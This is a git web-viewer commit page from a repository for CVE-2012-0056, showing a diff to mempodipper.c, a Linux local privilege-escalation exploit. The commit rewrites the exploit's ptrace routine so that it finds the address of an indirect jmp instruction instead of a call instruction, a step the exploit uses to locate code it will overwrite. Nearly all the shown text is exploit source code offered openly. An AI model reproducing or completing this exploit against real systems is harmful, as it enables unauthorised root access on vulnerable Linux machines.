aboutsummaryrefslogtreecommitdiffstats
path: root/mempodipper.c
diff options
context:
space:
mode:
authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 17:38:32 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 18:12:08 +0100
commit513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d (patch)
tree8d22ee73ab5d88ec5fae5b661b3795cb95eb870b /mempodipper.c
parentNot always exit@plt (diff)
downloadCVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.tar.xz
CVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.zip
Search for IP of next jmp instead.
Diffstat (limited to 'mempodipper.c')
-rw-r--r--mempodipper.c10
1 files changed, 3 insertions, 7 deletions
diff --git a/mempodipper.c b/mempodipper.c
index dcc037c..e35d62a 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -17,7 +17,6 @@
#define _LARGEFILE64_SOURCE
#include <stdio.h>
-#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
@@ -126,12 +125,9 @@ unsigned long ptrace_address()
#error "That platform is not supported."
#endif
if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- return instruction_pointer + offset;
- }
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
}
}
} else {